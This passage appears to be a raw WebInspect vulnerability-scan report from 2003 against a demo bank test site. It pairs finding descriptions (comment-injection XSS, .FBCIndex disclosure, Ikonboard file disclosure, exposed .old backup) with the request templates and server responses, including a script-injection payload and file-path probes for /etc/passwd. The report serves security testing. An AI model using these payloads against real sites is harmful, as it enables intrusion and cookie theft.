system. If you are not an authorized user of this system or do not consent to
continued monitoring, exit the system at this time. </FONT></TD>
</TR>
</TABLE></TD>
<TD WIDTH="175" VALIGN="TOP" ROWSPAN="7"><table width="175" border="0" cellspacing="3" cellpadding="5">
<tr>
<td STYLE="border: 1px solid black"><p><img src="images/SPI_logo.jpg" width="150" height="36"></p>
<p><font size="2" face="Arial, Helvetica, sans-serif">If you would
like a free trial version of WebInspect to test this website
site.</font></p>
<p><font size="2" face="Arial, Helvetica, sans-serif"><a href="http://www.spidynamics.com/download.html" target="_blank"><strong>Download Click Here</strong></a></font></p></td>
</tr>
</table></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-login.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><A
HREF="/pindex.asp"><IMG SRC="/images/financial-planning.gif" ALIGN="LEFT"
BORDER="0" WIDTH="150" HEIGHT="20"></A></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="19"><IMG SRC="/images/services.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="24"><IMG SRC="/images/your-accounts.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-support.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border-left: 12px solid #2E7AA3" WIDTH="162"
ALIGN="CENTER">
<FORM ACTION="rootlogin.asp" METHOD="post">
<P><FONT SIZE="-1" FACE="Arial"> Register for an Interest Checking
Account with FreeBank:</FONT></P>
<P><FONT SIZE="-1" FACE="Arial">First Name:</FONT><INPUT
TYPE="text" NAME="txtPassPhrase"
STYLE="border: 1px solid black; spacing: 0"><BR><FONT SIZE="-1"
FACE="Arial">Last Name:</FONT><INPUT TYPE="text" NAME="txtName"
STYLE="border: 1px solid black; spacing: 0"><BR>
<INPUT TYPE="hidden" NAME="txtHidden" VALUE="This was hidden from the user">
<INPUT TYPE="submit" STYLE="border: 1px solid black"
VALUE="Register"></P></FORM></TD>
</TR>
</TABLE>
</BODY>
</HTML>
Possible Comment Injection Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This takes place due to the fact that some web applications embed user input in the HTML comments. <br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?err=<attack>--><script>alert('XSS')</script></attack> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/login1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
--><script>alert\('XSS'\)<\/script>GET /_vti_pvt/.FBCIndex HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:46:35 GMT
Content-Length: 4214
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>The page cannot be displayed</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Open the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page, and then look for links to the information you want.</li>
<li>Click the <a href="javascript:location.reload()">
Refresh</a> button, or try again later.<br>
</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<p>
<li>Background:<br>
This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p>
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li></p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
OSX Content File (FBCIndex)By exploiting the case-insensitivity of HFS+, an attacker can evade Apache's access controls.
Using mod_hfs (which takes care of case-insensitivity in directory names) and using < FilesMatch> (with well-chosen regular expressions) instead of < Files> directives (to take care of case-insensitivity in filenames), we can "cure" the case-insensitivity problem and restore Apache's access controls. <br><br>
However, there is another problem lurking. A vulnerability has been found that allows remote attackers to list the content of the directory and view the index file created for those files by requesting an a special file that automatically created by Mac OS X.GET /_vti_pvt/<attack>.FBCIndex</attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
40[13] |200 |Bud2GET /_vti_cnf/DocURL.indexOf( HTTP/1.0
Referer: http://zero.webappsecurity.com:80/_vti_cnf/
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes3=; passes2=; passes=; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:46 GMT
Content-Length: 4214
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>The page cannot be displayed</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Open the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page, and then look for links to the information you want.</li>
<li>Click the <a href="javascript:location.reload()">
Refresh</a> button, or try again later.<br>
</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<p>
<li>Background:<br>
This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p>
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li></p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
Existing filename found in commentsA URL or filename was found in the comments of the file and found to exist.Remove the comment.GET <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/_vti_cnf/
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes3=; passes2=; passes=; CustomCookie=WebInspect
GET /cgi-bin/ikonboard/help.cgi HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:32:53 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:47:01 GMT
ETag: "ac14c2f8a9dc11:8f6"
Content-Length: 18
bleh exploit :0:0:Ikonboard Arbitrary File Source DisclosureIkonboard was detected to be running on the
system.<BR><BR><A
HREF="http://www.ikondiscussion.com/ikonboard/">Ikonboard</A> is a free
bulletin board system. A vulnerability in the product allows remote attackers
to read local files with the privileges of the web server.
<BR><BR><B>Vulnerable systems:</B> Ikonboard v2.1.6b and v2.1.7bAn official patch is not available yet. You can
fix the script temporarily by inserting the following line under line 45 in
'help.cgi':<BR> <BR><TT> if($inhelpon =~ /\.\./) { &hackdetected; }<BR>
<BR> then at the bottom append:<BR> <BR> sub hackdetected {<BR> print
"Content-type: text/plain\n\n";<BR> print "sorry, this hole was patched
:)\n";<BR> print "you have been logged.\n";<BR> exit;<BR> }</TT>GET <var name="path"/> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
200 |401GET /rootlogin.old HTTP/1.0
Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:34:58 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:38:20 GMT
ETag: "241b8c2a8dc11:8f6"
Content-Length: 1351
<%
dim sName, sPassPhrase
sName=Request("txtName")
sPassPhrase=Request("txtPassPhrase")
%>
<html>
<body>
<%
if lcase(sName)="root" then
Response.Write "Hello " & sName & "<br>Welcome back"
elseif lcase(sName)="/etc/passwd" then
Response.Write "root:x:0:0::/root:/bin/sh"
Response.Write "dsmith:x:516:522::/home/dsmith:/bin/false"
Response.Write "etaylor:x:517:523::/home/etaylor:/bin/false"
Response.Write "scooby:x:518:524::/home/scooby-doo:/bin/false"
Response.Write "pshaggy:x:519:526::/home/pshaggy:/bin/false"
Response.Write "dtomson:x:520:527::/home/dtomson:/bin/false"
Response.Write "jsmith:x:521:528::/home/jsmith:/bin/false"
elseif lcase(sName)="/boot.ini" then
Response.Write "[boot loader]"
Response.Write "timeout=30"
Response.Write "default=multi(0)disk(0)rdisk(0)partition(3)\WINNT"
Response.Write "[operating systems]"
Response.Write "multi(0)disk(0)rdisk(0)partition(3)\WINNT=""Microsoft Windows 2000 Server"" /fastdetect"
Response.Write "multi(0)disk(0)rdisk(0)partition(2)\WINNT=""Microsoft Windows 2000 Professional"" /fastdetect"
elseif lcase(sName)="*" then
Response.Write "An error has occured"
elseif lcase(sName)=";" then
Response.Write "NON-HTML ERROR"
else
Response.Write "Go away " & sName & "<br>I don't know you"
end if
%>
</body>
</html>
Backup File (.old)A backup file with the extension .old was found on the server. Often, old files are renamed with such an extension to distinguish them from production files. However, the source code for old files that have been renamed in this manner and left in the webroot can often be retrieved.GET /rootlogin.<attack>old</attack> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
200 |Content-Type:\stext/plain |Content-Type:\sapplication/octet-stream GET /banklogin.asp?err=Invalid%20Login%3A HTTP/1.0
Referer: http://zero.webappsecurity.com:80/login1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:21 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4929
Content-Type: text/html
Cache-control: private
Set-Cookie: sessionid=; path=/
Set-Cookie: state=; path=/
Set-Cookie: username=; path=/
Set-Cookie: userid=; path=/
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY>
<TABLE BGCOLOR="#ffffff" STYLE="border: 3px solid black">
<TR>
<TD
STYLE="border-left: 12px solid #2E7AA3; border-top: 7px solid #2E7AA3"
HEIGHT="47" ROWSPAN="2" VALIGN="TOP"><IMG
SRC="/images/freebank-logo2.gif" ALIGN="LEFT" BORDER="0" WIDTH="150"
HEIGHT="50"><BR><BR></TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571" HEIGHT="47"
VALIGN="TOP"> </TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571"
VALIGN="TOP"> </TD>
</TR>
<TR>
<TD WIDTH="571" VALIGN="TOP" ROWSPAN="7" HEIGHT="49">
<TABLE>
<TR>
<TD BGCOLOR="#2E7AA3" STYLE="border: 1px solid black" WIDTH="258"
HEIGHT="217">
<FORM ACTION="login1.asp" METHOD="post">
<CENTER>Invalid Login:<br>Username:<BR><INPUT TYPE="text" NAME="login"
STYLE="border: 1px solid black; spacing: 0"><BR>Password:<BR><INPUT TYPE="password"
NAME="password" STYLE="border: 1px solid black; spacing: 0"><BR><INPUT
TYPE="radio" NAME="graphicOption" VALUE="minimum" CHECKED="CHECKED"><FONT
SIZE="-1">Minimum Graphics</FONT><BR><INPUT TYPE="radio" NAME="graphicOption"
VALUE="standard"><FONT SIZE="-1">Standard Graphics</FONT><BR><BR><INPUT
TYPE="submit" STYLE="border: 1px solid black"
VALUE=" Access Accounts "><BR></CENTER></FORM></TD>
<TD STYLE="border: 1px solid black" WIDTH="304" HEIGHT="217"
ROWSPAN="2"><IMG SRC="/images/lock.gif" WIDTH="304" HEIGHT="266"
BORDER="0"></TD>
</TR>
<TR>
<TD BGCOLOR="ffffff" STYLE="border: 1px solid black" WIDTH="258" HEIGHT="241"
VALIGN="TOP"><FONT SIZE="-2">We are confident of our system's ability to
protect all transactions; however, this is not an invitation for people to
attempt unauthorized access to the system. This is a private computing system
which is restricted to authorized individuals. Actual or attempted unauthorized
use of this computer system may result in criminal and/or civil prosecution. We
reserve the right to view, monitor, and record activity on the system without
notice or permission. Any information obtained by monitoring, reviewing, or
recording is subject to review by law enforcement organizations in connection
with the investigation or prosecution of possible criminal activity on the
system. If you are not an authorized user of this system or do not consent to
continued monitoring, exit the system at this time. </FONT></TD>
</TR>
</TABLE></TD>
<TD WIDTH="175" VALIGN="TOP" ROWSPAN="7"><table width="175" border="0" cellspacing="3" cellpadding="5">
<tr>
<td STYLE="border: 1px solid black"><p><img src="images/SPI_logo.jpg" width="150" height="36"></p>
<p><font size="2" face="Arial, Helvetica, sans-serif">If you would
like a free trial version of WebInspect to test this website
site.</font></p>
<p><font size="2" face="Arial, Helvetica, sans-serif"><a href="http://www.spidynamics.com/download.html" target="_blank"><strong>Download Click Here</strong></a></font></p></td>
</tr>
</table></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-login.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><A
HREF="/pindex.asp"><IMG SRC="/images/financial-planning.gif" ALIGN="LEFT"
BORDER="0" WIDTH="150" HEIGHT="20"></A></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="19"><IMG SRC="/images/services.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="24"><IMG SRC="/images/your-accounts.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-support.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border-left: 12px solid #2E7AA3" WIDTH="162"
ALIGN="CENTER">
<FORM ACTION="rootlogin.asp" METHOD="post">
<P><FONT SIZE="-1" FACE="Arial"> Register for an Interest Checking
Account with FreeBank:</FONT></P>
<P><FONT SIZE="-1" FACE="Arial">First Name:</FONT><INPUT
TYPE="text" NAME="txtPassPhrase"
STYLE="border: 1px solid black; spacing: 0"><BR><FONT SIZE="-1"
FACE="Arial">Last Name:</FONT><INPUT TYPE="text" NAME="txtName"
STYLE="border: 1px solid black; spacing: 0"><BR>
<INPUT TYPE="hidden" NAME="txtHidden" VALUE="This was hidden from the user">
<INPUT TYPE="submit" STYLE="border: 1px solid black"
VALUE="Register"></P></FORM></TD>
</TR>
</TABLE>
</BODY>
</HTML>
User supplied data without POSTThis policy states that any area of the website or web application that contains sensitive information or access to privileged functionality such as remote site administration requires any query string be reported as bad behavior. This also should require that the user send everything through a POST request. Webinspect has detected that the URL<B> ~FullURL~ </b>has failed this policy.GET <var name="path"/>?err=Invalid%20Login%3A <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/login1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
GET /banklogin.asp?err=Invalid%20Login%3A HTTP/1.0
Referer: http://zero.webappsecurity.com:80/login1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:21 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4929
Content-Type: text/html
Cache-control: private
Set-Cookie: sessionid=; path=/
Set-Cookie: state=; path=/
Set-Cookie: username=; path=/
Set-Cookie: userid=; path=/
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY>
<TABLE BGCOLOR="#ffffff" STYLE="border: 3px solid black">
<TR>
<TD
STYLE="border-left: 12px solid #2E7AA3; border-top: 7px solid #2E7AA3"
HEIGHT="47" ROWSPAN="2" VALIGN="TOP"><IMG
SRC="/images/freebank-logo2.gif" ALIGN="LEFT" BORDER="0" WIDTH="150"
HEIGHT="50"><BR><BR></TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571" HEIGHT="47"
VALIGN="TOP"> </TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571"
VALIGN="TOP"> </TD>
</TR>
<TR>
<TD WIDTH="571" VALIGN="TOP" ROWSPAN="7" HEIGHT="49">
<TABLE>
<TR>
<TD BGCOLOR="#2E7AA3" STYLE="border: 1px solid black" WIDTH="258"
HEIGHT="217">
<FORM ACTION="login1.asp" METHOD="post">
<CENTER>Invalid Login:<br>Username:<BR><INPUT TYPE="text" NAME="login"
STYLE="border: 1px solid black; spacing: 0"><BR>Password:<BR><INPUT TYPE="password"
NAME="password" STYLE="border: 1px solid black; spacing: 0"><BR><INPUT
TYPE="radio" NAME="graphicOption" VALUE="minimum" CHECKED="CHECKED"><FONT
SIZE="-1">Minimum Graphics</FONT><BR><INPUT TYPE="radio" NAME="graphicOption"
VALUE="standard"><FONT SIZE="-1">Standard Graphics</FONT><BR><BR><INPUT
TYPE="submit" STYLE="border: 1px solid black"
VALUE=" Access Accounts "><BR></CENTER></FORM></TD>
<TD STYLE="border: 1px solid black" WIDTH="304" HEIGHT="217"
ROWSPAN="2"><IMG SRC="/images/lock.gif" WIDTH="304" HEIGHT="266"
BORDER="0"></TD>
</TR>
<TR>
<TD BGCOLOR="ffffff" STYLE="border: 1px solid black" WIDTH="258" HEIGHT="241"
VALIGN="TOP"><FONT SIZE="-2">We are confident of our system's ability to
protect all transactions; however, this is not an invitation for people to
attempt unauthorized access to the system. This is a private computing system
which is restricted to authorized individuals. Actual or attempted unauthorized
use of this computer system may result in criminal and/or civil prosecution. We
reserve the right to view, monitor, and record activity on the system without
notice or permission. Any information obtained by monitoring, reviewing, or
recording is subject to review by law enforcement organizations in connection
with the investigation or prosecution of possible criminal activity on the
system. If you are not an authorized user of this system or do not consent to
continued monitoring, exit the system at this time. </FONT></TD>
</TR>
</TABLE></TD>
<TD WIDTH="175" VALIGN="TOP" ROWSPAN="7"><table width="175" border="0" cellspacing="3" cellpadding="5">
<tr>
<td STYLE="border: 1px solid black"><p><img src="images/SPI_logo.jpg" width="150" height="36"></p>
<p><font size="2" face="Arial, Helvetica, sans-serif">If you would
like a free trial version of WebInspect to test this website
site.</font></p>
<p><font size="2" face="Arial, Helvetica, sans-serif"><a href="http://www.spidynamics.com/download.html" target="_blank"><strong>Download Click Here</strong></a></font></p></td>
</tr>
</table></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-login.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><A
HREF="/pindex.asp"><IMG SRC="/images/financial-planning.gif" ALIGN="LEFT"
BORDER="0" WIDTH="150" HEIGHT="20"></A></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="19"><IMG SRC="/images/services.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="24"><IMG SRC="/images/your-accounts.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-support.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border-left: 12px solid #2E7AA3" WIDTH="162"
ALIGN="CENTER">
<FORM ACTION="rootlogin.asp" METHOD="post">
<P><FONT SIZE="-1" FACE="Arial"> Register for an Interest Checking
Account with FreeBank:</FONT></P>
<P><FONT SIZE="-1" FACE="Arial">First Name:</FONT><INPUT
TYPE="text" NAME="txtPassPhrase"
STYLE="border: 1px solid black; spacing: 0"><BR><FONT SIZE="-1"
FACE="Arial">Last Name:</FONT><INPUT TYPE="text" NAME="txtName"
